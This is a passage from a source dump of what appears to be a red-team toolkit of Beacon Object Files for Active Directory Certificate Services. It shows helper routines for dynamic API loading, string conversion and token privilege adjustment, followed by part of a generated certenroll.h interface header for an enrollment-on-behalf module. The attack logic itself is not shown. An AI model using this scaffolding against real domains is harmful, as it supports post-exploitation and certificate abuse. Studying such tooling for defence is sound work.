// szFunction          - The Function that you want to load
// Returns a FARPROC function pointer if successful, or NULL if lookup fails
//
FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif

char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

wchar_t* Utf8ToUtf16(const char* input)
{
    int ret = KERNEL32$MultiByteToWideChar(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0
    );

    wchar_t* newString = (wchar_t*)intAlloc(sizeof(wchar_t) * ret);

    ret = KERNEL32$MultiByteToWideChar(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        ret
    );

    if (0 == ret)
    {
        //printf("Failed to convert UNICODE string from UTF-16 to UTF-8. Last error: %d\n", (int)GetLastError());
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

#ifndef BOF
DWORD SetPrivilege(
    HANDLE hTokenArg,          // access token handle
    LPCSTR lpszPrivilege,  // name of privilege to enable/disable
    BOOL bEnablePrivilege   // to enable or disable privilege
    ) 
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    DWORD dwErrorCode = ERROR_SUCCESS;

    if ( hTokenArg )
    {
        hToken = hTokenArg;
    }
    else
    {
        // Open a handle to the access token for the calling process. That is this running program
        if( FALSE == ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))    
        {
            dwErrorCode = KERNEL32$GetLastError();
            goto SetPrivilege_end;
        }
    }
    

    if ( FALSE == ADVAPI32$LookupPrivilegeValueA( 
            NULL,            // lookup privilege on local system
            lpszPrivilege,   // privilege to lookup 
            &luid ) )        // receives LUID of privilege
    {
        dwErrorCode = KERNEL32$GetLastError();
        goto SetPrivilege_end; 
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    if (bEnablePrivilege)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;

    // Enable the privilege or disable all privileges.

    if ( FALSE == ADVAPI32$AdjustTokenPrivileges(
           hToken, 
           FALSE, 
           &tp, 
           sizeof(TOKEN_PRIVILEGES), 
           (PTOKEN_PRIVILEGES) NULL, 
           (PDWORD) NULL) )
    {
        dwErrorCode = KERNEL32$GetLastError();
        goto SetPrivilege_end; 
    } 

    // Possibly ERROR_NOT_ALL_ASSIGNED
    dwErrorCode = KERNEL32$GetLastError();

SetPrivilege_end:

    if ( !hTokenArg )
    {
        if ( hToken )
        {
            KERNEL32$CloseHandle(hToken);
            hToken = NULL;
        }
    }

    return dwErrorCode;
}
#endif

//release any global functions here
void bofstop()
{

    return;
}


================================================
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/certenroll.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certenroll_h__
#define __certenroll_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __IObjectId_FWD_DEFINED__
#define __IObjectId_FWD_DEFINED__
typedef interface IObjectId IObjectId;

#endif 	/* __IObjectId_FWD_DEFINED__ */


#ifndef __IObjectIds_FWD_DEFINED__
#define __IObjectIds_FWD_DEFINED__
typedef interface IObjectIds IObjectIds;

#endif 	/* __IObjectIds_FWD_DEFINED__ */


#ifndef __IBinaryConverter_FWD_DEFINED__
#define __IBinaryConverter_FWD_DEFINED__
typedef interface IBinaryConverter IBinaryConverter;

#endif 	/* __IBinaryConverter_FWD_DEFINED__ */


#ifndef __IBinaryConverter2_FWD_DEFINED__
#define __IBinaryConverter2_FWD_DEFINED__
typedef interface IBinaryConverter2 IBinaryConverter2;

#endif 	/* __IBinaryConverter2_FWD_DEFINED__ */


#ifndef __IX500DistinguishedName_FWD_DEFINED__
#define __IX500DistinguishedName_FWD_DEFINED__
typedef interface IX500DistinguishedName IX500DistinguishedName;

#endif 	/* __IX500DistinguishedName_FWD_DEFINED__ */


#ifndef __IX509EnrollmentStatus_FWD_DEFINED__
#define __IX509EnrollmentStatus_FWD_DEFINED__
typedef interface IX509EnrollmentStatus IX509EnrollmentStatus;

#endif 	/* __IX509EnrollmentStatus_FWD_DEFINED__ */


#ifndef __ICspAlgorithm_FWD_DEFINED__
#define __ICspAlgorithm_FWD_DEFINED__
typedef interface ICspAlgorithm ICspAlgorithm;

#endif 	/* __ICspAlgorithm_FWD_DEFINED__ */


#ifndef __ICspAlgorithms_FWD_DEFINED__
#define __ICspAlgorithms_FWD_DEFINED__
typedef interface ICspAlgorithms ICspAlgorithms;

#endif 	/* __ICspAlgorithms_FWD_DEFINED__ */


#ifndef __ICspInformation_FWD_DEFINED__
#define __ICspInformation_FWD_DEFINED__
typedef interface ICspInformation ICspInformation;

#endif 	/* __ICspInformation_FWD_DEFINED__ */


#ifndef __ICspInformations_FWD_DEFINED__
#define __ICspInformations_FWD_DEFINED__
typedef interface ICspInformations ICspInformations;

#endif 	/* __ICspInformations_FWD_DEFINED__ */


#ifndef __ICspStatus_FWD_DEFINED__
#define __ICspStatus_FWD_DEFINED__
typedef interface ICspStatus ICspStatus;

#endif 	/* __ICspStatus_FWD_DEFINED__ */


#ifndef __ICspStatuses_FWD_DEFINED__
#define __ICspStatuses_FWD_DEFINED__
typedef interface ICspStatuses ICspStatuses;

#endif 	/* __ICspStatuses_FWD_DEFINED__ */


#ifndef __IX509PublicKey_FWD_DEFINED__
#define __IX509PublicKey_FWD_DEFINED__
typedef interface IX509PublicKey IX509PublicKey;

#endif 	/* __IX509PublicKey_FWD_DEFINED__ */


#ifndef __IX509PrivateKey_FWD_DEFINED__
#define __IX509PrivateKey_FWD_DEFINED__
typedef interface IX509PrivateKey IX509PrivateKey;

#endif 	/* __IX509PrivateKey_FWD_DEFINED__ */


#ifndef __IX509PrivateKey2_FWD_DEFINED__
#define __IX509PrivateKey2_FWD_DEFINED__
typedef interface IX509PrivateKey2 IX509PrivateKey2;

#endif 	/* __IX509PrivateKey2_FWD_DEFINED__ */


#ifndef __IX509EndorsementKey_FWD_DEFINED__
#define __IX509EndorsementKey_FWD_DEFINED__
typedef interface IX509EndorsementKey IX509EndorsementKey;

#endif 	/* __IX509EndorsementKey_FWD_DEFINED__ */


#ifndef __IX509Extension_FWD_DEFINED__
#define __IX509Extension_FWD_DEFINED__
typedef interface IX509Extension IX509Extension;

#endif 	/* __IX509Extension_FWD_DEFINED__ */


#ifndef __IX509Extensions_FWD_DEFINED__
#define __IX509Extensions_FWD_DEFINED__
typedef interface IX509Extensions IX509Extensions;

#endif 	/* __IX509Extensions_FWD_DEFINED__ */


#ifndef __IX509ExtensionKeyUsage_FWD_DEFINED__
#define __IX509ExtensionKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionKeyUsage IX509ExtensionKeyUsage;

#endif 	/* __IX509ExtensionKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
#define __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__
typedef interface IX509ExtensionEnhancedKeyUsage IX509ExtensionEnhancedKeyUsage;

#endif 	/* __IX509ExtensionEnhancedKeyUsage_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplateName_FWD_DEFINED__
#define __IX509ExtensionTemplateName_FWD_DEFINED__
typedef interface IX509ExtensionTemplateName IX509ExtensionTemplateName;

#endif 	/* __IX509ExtensionTemplateName_FWD_DEFINED__ */


#ifndef __IX509ExtensionTemplate_FWD_DEFINED__
#define __IX509ExtensionTemplate_FWD_DEFINED__
typedef interface IX509ExtensionTemplate IX509ExtensionTemplate;

#endif 	/* __IX509ExtensionTemplate_FWD_DEFINED__ */


#ifndef __IAlternativeName_FWD_DEFINED__
#define __IAlternativeName_FWD_DEFINED__
typedef interface IAlternativeName IAlternativeName;

#endif 	/* __IAlternativeName_FWD_DEFINED__ */


#ifndef __IAlternativeNames_FWD_DEFINED__
#define __IAlternativeNames_FWD_DEFINED__
typedef interface IAlternativeNames IAlternativeNames;

#endif 	/* __IAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionAlternativeNames_FWD_DEFINED__
#define __IX509ExtensionAlternativeNames_FWD_DEFINED__
typedef interface IX509ExtensionAlternativeNames IX509ExtensionAlternativeNames;

#endif 	/* __IX509ExtensionAlternativeNames_FWD_DEFINED__ */


#ifndef __IX509ExtensionBasicConstraints_FWD_DEFINED__
#define __IX509ExtensionBasicConstraints_FWD_DEFINED__
typedef interface IX509ExtensionBasicConstraints IX509ExtensionBasicConstraints;

#endif 	/* __IX509ExtensionBasicConstraints_FWD_DEFINED__ */


#ifndef __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__
typedef interface IX509ExtensionSubjectKeyIdentifier IX509ExtensionSubjectKeyIdentifier;

#endif 	/* __IX509ExtensionSubjectKeyIdentifier_FWD_DEFINED__ */


#ifndef __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
#define __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__
typedef interface IX509ExtensionAuthorityKeyIdentifier IX509ExtensionAuthorityKeyIdentifier;

#endif 	/* __IX509ExtensionAuthorityKeyIdentifier_FWD_DEFINED__ */


#ifndef __ISmimeCapability_FWD_DEFINED__
#define __ISmimeCapability_FWD_DEFINED__
typedef interface ISmimeCapability ISmimeCapability;

#endif 	/* __ISmimeCapability_FWD_DEFINED__ */


#ifndef __ISmimeCapabilities_FWD_DEFINED__
#define __ISmimeCapabilities_FWD_DEFINED__
typedef interface ISmimeCapabilities ISmimeCapabilities;

#endif 	/* __ISmimeCapabilities_FWD_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
#define __IX509ExtensionSmimeCapabilities_FWD_DEFINED__
typedef interface IX509ExtensionSmimeCapabilities IX509ExtensionSmimeCapabilities;

#endif 	/* __IX509ExtensionSmimeCapabilities_FWD_DEFINED__ */


#ifndef __IPolicyQualifier_FWD_DEFINED__
#define __IPolicyQualifier_FWD_DEFINED__
typedef interface IPolicyQualifier IPolicyQualifier;

#endif 	/* __IPolicyQualifier_FWD_DEFINED__ */


#ifndef __IPolicyQualifiers_FWD_DEFINED__
#define __IPolicyQualifiers_FWD_DEFINED__
typedef interface IPolicyQualifiers IPolicyQualifiers;

#endif 	/* __IPolicyQualifiers_FWD_DEFINED__ */


#ifndef __ICertificatePolicy_FWD_DEFINED__
#define __ICertificatePolicy_FWD_DEFINED__
typedef interface ICertificatePolicy ICertificatePolicy;

#endif 	/* __ICertificatePolicy_FWD_DEFINED__ */


#ifndef __ICertificatePolicies_FWD_DEFINED__
#define __ICertificatePolicies_FWD_DEFINED__
typedef interface ICertificatePolicies ICertificatePolicies;

#endif 	/* __ICertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionCertificatePolicies_FWD_DEFINED__
#define __IX509ExtensionCertificatePolicies_FWD_DEFINED__
typedef interface IX509ExtensionCertificatePolicies IX509ExtensionCertificatePolicies;

#endif 	/* __IX509ExtensionCertificatePolicies_FWD_DEFINED__ */


#ifndef __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
#define __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__
typedef interface IX509ExtensionMSApplicationPolicies IX509ExtensionMSApplicationPolicies;

#endif 	/* __IX509ExtensionMSApplicationPolicies_FWD_DEFINED__ */


#ifndef __IX509Attribute_FWD_DEFINED__
#define __IX509Attribute_FWD_DEFINED__
typedef interface IX509Attribute IX509Attribute;

#endif 	/* __IX509Attribute_FWD_DEFINED__ */


#ifndef __IX509Attributes_FWD_DEFINED__
#define __IX509Attributes_FWD_DEFINED__
typedef interface IX509Attributes IX509Attributes;

#endif 	/* __IX509Attributes_FWD_DEFINED__ */


#ifndef __IX509AttributeExtensions_FWD_DEFINED__
#define __IX509AttributeExtensions_FWD_DEFINED__
typedef interface IX509AttributeExtensions IX509AttributeExtensions;

#endif 	/* __IX509AttributeExtensions_FWD_DEFINED__ */


#ifndef __IX509AttributeClientId_FWD_DEFINED__
#define __IX509AttributeClientId_FWD_DEFINED__
typedef interface IX509AttributeClientId IX509AttributeClientId;

#endif 	/* __IX509AttributeClientId_FWD_DEFINED__ */


#ifndef __IX509AttributeRenewalCertificate_FWD_DEFINED__
#define __IX509AttributeRenewalCertificate_FWD_DEFINED__
typedef interface IX509AttributeRenewalCertificate IX509AttributeRenewalCertificate;

#endif 	/* __IX509AttributeRenewalCertificate_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKey_FWD_DEFINED__
#define __IX509AttributeArchiveKey_FWD_DEFINED__
typedef interface IX509AttributeArchiveKey IX509AttributeArchiveKey;

#endif 	/* __IX509AttributeArchiveKey_FWD_DEFINED__ */


#ifndef __IX509AttributeArchiveKeyHash_FWD_DEFINED__
#define __IX509AttributeArchiveKeyHash_FWD_DEFINED__
typedef interface IX509AttributeArchiveKeyHash IX509AttributeArchiveKeyHash;

#endif 	/* __IX509AttributeArchiveKeyHash_FWD_DEFINED__ */


#ifndef __IX509AttributeOSVersion_FWD_DEFINED__
#define __IX509AttributeOSVersion_FWD_DEFINED__
typedef interface IX509AttributeOSVersion IX509AttributeOSVersion;

#endif 	/* __IX509AttributeOSVersion_FWD_DEFINED__ */


#ifndef __IX509AttributeCspProvider_FWD_DEFINED__
#define __IX509AttributeCspProvider_FWD_DEFINED__
typedef interface IX509AttributeCspProvider IX509AttributeCspProvider;

#endif 	/* __IX509AttributeCspProvider_FWD_DEFINED__ */


#ifndef __ICryptAttribute_FWD_DEFINED__
#define __ICryptAttribute_FWD_DEFINED__
typedef interface ICryptAttribute ICryptAttribute;

#endif 	/* __ICryptAttribute_FWD_DEFINED__ */


#ifndef __ICryptAttributes_FWD_DEFINED__
#define __ICryptAttributes_FWD_DEFINED__
typedef interface ICryptAttributes ICryptAttributes;

#endif 	/* __ICryptAttributes_FWD_DEFINED__ */


#ifndef __ICertProperty_FWD_DEFINED__
#define __ICertProperty_FWD_DEFINED__
typedef interface ICertProperty ICertProperty;

#endif 	/* __ICertProperty_FWD_DEFINED__ */


#ifndef __ICertProperties_FWD_DEFINED__
#define __ICertProperties_FWD_DEFINED__
typedef interface ICertProperties ICertProperties;

#endif 	/* __ICertProperties_FWD_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_FWD_DEFINED__
#define __ICertPropertyFriendlyName_FWD_DEFINED__
typedef interface ICertPropertyFriendlyName ICertPropertyFriendlyName;

#endif 	/* __ICertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __ICertPropertyDescription_FWD_DEFINED__
#define __ICertPropertyDescription_FWD_DEFINED__
typedef interface ICertPropertyDescription ICertPropertyDescription;

#endif 	/* __ICertPropertyDescription_FWD_DEFINED__ */


#ifndef __ICertPropertyAutoEnroll_FWD_DEFINED__
#define __ICertPropertyAutoEnroll_FWD_DEFINED__
typedef interface ICertPropertyAutoEnroll ICertPropertyAutoEnroll;

#endif 	/* __ICertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __ICertPropertyRequestOriginator_FWD_DEFINED__
#define __ICertPropertyRequestOriginator_FWD_DEFINED__
typedef interface ICertPropertyRequestOriginator ICertPropertyRequestOriginator;

#endif 	/* __ICertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __ICertPropertySHA1Hash_FWD_DEFINED__
#define __ICertPropertySHA1Hash_FWD_DEFINED__
typedef interface ICertPropertySHA1Hash ICertPropertySHA1Hash;

#endif 	/* __ICertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __ICertPropertyKeyProvInfo_FWD_DEFINED__
#define __ICertPropertyKeyProvInfo_FWD_DEFINED__
typedef interface ICertPropertyKeyProvInfo ICertPropertyKeyProvInfo;

#endif 	/* __ICertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __ICertPropertyArchived_FWD_DEFINED__
#define __ICertPropertyArchived_FWD_DEFINED__
typedef interface ICertPropertyArchived ICertPropertyArchived;

#endif 	/* __ICertPropertyArchived_FWD_DEFINED__ */


#ifndef __ICertPropertyBackedUp_FWD_DEFINED__
#define __ICertPropertyBackedUp_FWD_DEFINED__
typedef interface ICertPropertyBackedUp ICertPropertyBackedUp;

#endif 	/* __ICertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollment_FWD_DEFINED__
#define __ICertPropertyEnrollment_FWD_DEFINED__
typedef interface ICertPropertyEnrollment ICertPropertyEnrollment;

#endif 	/* __ICertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __ICertPropertyRenewal_FWD_DEFINED__
#define __ICertPropertyRenewal_FWD_DEFINED__
typedef interface ICertPropertyRenewal ICertPropertyRenewal;

#endif 	/* __ICertPropertyRenewal_FWD_DEFINED__ */


#ifndef __ICertPropertyArchivedKeyHash_FWD_DEFINED__
#define __ICertPropertyArchivedKeyHash_FWD_DEFINED__
typedef interface ICertPropertyArchivedKeyHash ICertPropertyArchivedKeyHash;

#endif 	/* __ICertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__
typedef interface ICertPropertyEnrollmentPolicyServer ICertPropertyEnrollmentPolicyServer;

#endif 	/* __ICertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509SignatureInformation_FWD_DEFINED__
#define __IX509SignatureInformation_FWD_DEFINED__
typedef interface IX509SignatureInformation IX509SignatureInformation;

#endif 	/* __IX509SignatureInformation_FWD_DEFINED__ */


#ifndef __ISignerCertificate_FWD_DEFINED__
#define __ISignerCertificate_FWD_DEFINED__
typedef interface ISignerCertificate ISignerCertificate;

#endif 	/* __ISignerCertificate_FWD_DEFINED__ */


#ifndef __ISignerCertificates_FWD_DEFINED__
#define __ISignerCertificates_FWD_DEFINED__
typedef interface ISignerCertificates ISignerCertificates;

#endif 	/* __ISignerCertificates_FWD_DEFINED__ */


#ifndef __IX509NameValuePair_FWD_DEFINED__
#define __IX509NameValuePair_FWD_DEFINED__
typedef interface IX509NameValuePair IX509NameValuePair;

#endif 	/* __IX509NameValuePair_FWD_DEFINED__ */


#ifndef __IX509NameValuePairs_FWD_DEFINED__
#define __IX509NameValuePairs_FWD_DEFINED__
typedef interface IX509NameValuePairs IX509NameValuePairs;

#endif 	/* __IX509NameValuePairs_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplate_FWD_DEFINED__
#define __IX509CertificateTemplate_FWD_DEFINED__
typedef interface IX509CertificateTemplate IX509CertificateTemplate;

#endif 	/* __IX509CertificateTemplate_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplates_FWD_DEFINED__
#define __IX509CertificateTemplates_FWD_DEFINED__
typedef interface IX509CertificateTemplates IX509CertificateTemplates;

#endif 	/* __IX509CertificateTemplates_FWD_DEFINED__ */


#ifndef __IX509CertificateTemplateWritable_FWD_DEFINED__
#define __IX509CertificateTemplateWritable_FWD_DEFINED__
typedef interface IX509CertificateTemplateWritable IX509CertificateTemplateWritable;

#endif 	/* __IX509CertificateTemplateWritable_FWD_DEFINED__ */


#ifndef __ICertificationAuthority_FWD_DEFINED__
#define __ICertificationAuthority_FWD_DEFINED__
typedef interface ICertificationAuthority ICertificationAuthority;

#endif 	/* __ICertificationAuthority_FWD_DEFINED__ */


#ifndef __ICertificationAuthorities_FWD_DEFINED__
#define __ICertificationAuthorities_FWD_DEFINED__
typedef interface ICertificationAuthorities ICertificationAuthorities;

#endif 	/* __ICertificationAuthorities_FWD_DEFINED__ */


#ifndef __IX509EnrollmentPolicyServer_FWD_DEFINED__
#define __IX509EnrollmentPolicyServer_FWD_DEFINED__
typedef interface IX509EnrollmentPolicyServer IX509EnrollmentPolicyServer;

#endif 	/* __IX509EnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __IX509PolicyServerUrl_FWD_DEFINED__
#define __IX509PolicyServerUrl_FWD_DEFINED__
typedef interface IX509PolicyServerUrl IX509PolicyServerUrl;

#endif 	/* __IX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __IX509PolicyServerListManager_FWD_DEFINED__
#define __IX509PolicyServerListManager_FWD_DEFINED__
typedef interface IX509PolicyServerListManager IX509PolicyServerListManager;

#endif 	/* __IX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __IX509CertificateRequest_FWD_DEFINED__
#define __IX509CertificateRequest_FWD_DEFINED__
typedef interface IX509CertificateRequest IX509CertificateRequest;

#endif 	/* __IX509CertificateRequest_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10 IX509CertificateRequestPkcs10;

#endif 	/* __IX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V2 IX509CertificateRequestPkcs10V2;

#endif 	/* __IX509CertificateRequestPkcs10V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V3_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V3_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V3 IX509CertificateRequestPkcs10V3;

#endif 	/* __IX509CertificateRequestPkcs10V3_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs10V4_FWD_DEFINED__
#define __IX509CertificateRequestPkcs10V4_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs10V4 IX509CertificateRequestPkcs10V4;

#endif 	/* __IX509CertificateRequestPkcs10V4_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_FWD_DEFINED__
#define __IX509CertificateRequestCertificate_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate IX509CertificateRequestCertificate;

#endif 	/* __IX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_FWD_DEFINED__
#define __IX509CertificateRequestCertificate2_FWD_DEFINED__
typedef interface IX509CertificateRequestCertificate2 IX509CertificateRequestCertificate2;

#endif 	/* __IX509CertificateRequestCertificate2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7 IX509CertificateRequestPkcs7;

#endif 	/* __IX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
#define __IX509CertificateRequestPkcs7V2_FWD_DEFINED__
typedef interface IX509CertificateRequestPkcs7V2 IX509CertificateRequestPkcs7V2;

#endif 	/* __IX509CertificateRequestPkcs7V2_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc_FWD_DEFINED__
#define __IX509CertificateRequestCmc_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc IX509CertificateRequestCmc;

#endif 	/* __IX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __IX509CertificateRequestCmc2_FWD_DEFINED__
#define __IX509CertificateRequestCmc2_FWD_DEFINED__
typedef interface IX509CertificateRequestCmc2 IX509CertificateRequestCmc2;

#endif 	/* __IX509CertificateRequestCmc2_FWD_DEFINED__ */


#ifndef __IX509Enrollment_FWD_DEFINED__
#define __IX509Enrollment_FWD_DEFINED__
typedef interface IX509Enrollment IX509Enrollment;

#endif 	/* __IX509Enrollment_FWD_DEFINED__ */


#ifndef __IX509Enrollment2_FWD_DEFINED__
#define __IX509Enrollment2_FWD_DEFINED__
typedef interface IX509Enrollment2 IX509Enrollment2;

#endif 	/* __IX509Enrollment2_FWD_DEFINED__ */


#ifndef __IX509EnrollmentHelper_FWD_DEFINED__
#define __IX509EnrollmentHelper_FWD_DEFINED__
typedef interface IX509EnrollmentHelper IX509EnrollmentHelper;

#endif 	/* __IX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __IX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __IX509EnrollmentWebClassFactory_FWD_DEFINED__
typedef interface IX509EnrollmentWebClassFactory IX509EnrollmentWebClassFactory;

#endif 	/* __IX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __IX509MachineEnrollmentFactory_FWD_DEFINED__
#define __IX509MachineEnrollmentFactory_FWD_DEFINED__
typedef interface IX509MachineEnrollmentFactory IX509MachineEnrollmentFactory;

#endif 	/* __IX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntry_FWD_DEFINED__
#define __IX509CertificateRevocationListEntry_FWD_DEFINED__
typedef interface IX509CertificateRevocationListEntry IX509CertificateRevocationListEntry;

#endif 	/* __IX509CertificateRevocationListEntry_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationListEntries_FWD_DEFINED__
#define __IX509CertificateRevocationListEntries_FWD_DEFINED__
typedef interface IX509CertificateRevocationListEntries IX509CertificateRevocationListEntries;

#endif 	/* __IX509CertificateRevocationListEntries_FWD_DEFINED__ */


#ifndef __IX509CertificateRevocationList_FWD_DEFINED__
#define __IX509CertificateRevocationList_FWD_DEFINED__
typedef interface IX509CertificateRevocationList IX509CertificateRevocationList;

#endif 	/* __IX509CertificateRevocationList_FWD_DEFINED__ */


#ifndef __ICertificateAttestationChallenge_FWD_DEFINED__
#define __ICertificateAttestationChallenge_FWD_DEFINED__
typedef interface ICertificateAttestationChallenge ICertificateAttestationChallenge;

#endif 	/* __ICertificateAttestationChallenge_FWD_DEFINED__ */


#ifndef __ICertificateAttestationChallenge2_FWD_DEFINED__
#define __ICertificateAttestationChallenge2_FWD_DEFINED__
typedef interface ICertificateAttestationChallenge2 ICertificateAttestationChallenge2;

#endif 	/* __ICertificateAttestationChallenge2_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollment_FWD_DEFINED__
#define __IX509SCEPEnrollment_FWD_DEFINED__
typedef interface IX509SCEPEnrollment IX509SCEPEnrollment;

#endif 	/* __IX509SCEPEnrollment_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollment2_FWD_DEFINED__
#define __IX509SCEPEnrollment2_FWD_DEFINED__
typedef interface IX509SCEPEnrollment2 IX509SCEPEnrollment2;

#endif 	/* __IX509SCEPEnrollment2_FWD_DEFINED__ */


#ifndef __IX509SCEPEnrollmentHelper_FWD_DEFINED__
#define __IX509SCEPEnrollmentHelper_FWD_DEFINED__
typedef interface IX509SCEPEnrollmentHelper IX509SCEPEnrollmentHelper;

#endif 	/* __IX509SCEPEnrollmentHelper_FWD_DEFINED__ */


#ifndef __CObjectId_FWD_DEFINED__
#define __CObjectId_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectId CObjectId;
#else
typedef struct CObjectId CObjectId;
#endif /* __cplusplus */

#endif 	/* __CObjectId_FWD_DEFINED__ */


#ifndef __CObjectIds_FWD_DEFINED__
#define __CObjectIds_FWD_DEFINED__

#ifdef __cplusplus
typedef class CObjectIds CObjectIds;
#else
typedef struct CObjectIds CObjectIds;
#endif /* __cplusplus */

#endif 	/* __CObjectIds_FWD_DEFINED__ */


#ifndef __CBinaryConverter_FWD_DEFINED__
#define __CBinaryConverter_FWD_DEFINED__

#ifdef __cplusplus
typedef class CBinaryConverter CBinaryConverter;
#else
typedef struct CBinaryConverter CBinaryConverter;
#endif /* __cplusplus */

#endif 	/* __CBinaryConverter_FWD_DEFINED__ */


#ifndef __CX500DistinguishedName_FWD_DEFINED__
